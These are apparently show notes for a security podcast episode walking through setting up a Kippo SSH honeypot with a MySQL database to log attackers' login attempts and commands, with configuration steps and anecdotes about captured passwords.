7MS #174: DIY SSH Honeypot with Kippo - Part 2
In this episode I took my Kippo installation to the next step by incorporating mysql. First thing I did is connected to my mysql instance:
mysql -u root -p
Then, I created an empty kippo database:
create database kippo;
Then I granted all permissions on the kippo database to a user called kipposql:
grant all on kippo.* TO 'kipposql'@'localhost' identified by 'A-PASSWORD-YOU-PICK';
quit to quit the mysql terminal.
Now, do a
cd /home/kippo/kippo/doc/sql/ and import the mysql.sql file by doing:
mysql -u kipposql -p -h localhost kippo < mysql.sql
(You'll be prompted for your kippo user's password at this point)
Now, open up the /home/kippo/kippo/kippo.cfg file and look for database_mysql part and fill in with appropriate info:
host = localhost
database = kippo
username = kipposql
password = mypassword
port = 3306
Be sure to uncomment these mysql-related lines before saving your file! I didn't, so I had to do a
ps x to find the string for kippo (it contains something like *.../usr/bin/python /usr/bin twisted -y kippo.tac..." and then lkill it with
kill 1906 or whatever the appropriate PID is.
./start.sh to fire this baby up!
From here you can use mysql commands to query the database. More on that in future episodes.
For now, though, another interesting file to look at is
userdb.txt - this contains a username and password list for legitimate users. I left the default one in place (root/123456) and what's fun about that is once users "hack" into the shell, all the commands they issue get captured and sucked into the mysql database too. So you can see what kinds of netcat/wget/etc. commands they run to try and grab malicious files and wreak havoc on your system!
Also, if users take advantage of the
passwd command, those new passwords get appended to the userdb.txt. So far, mine includes super secure passwords like toor, password, and password123.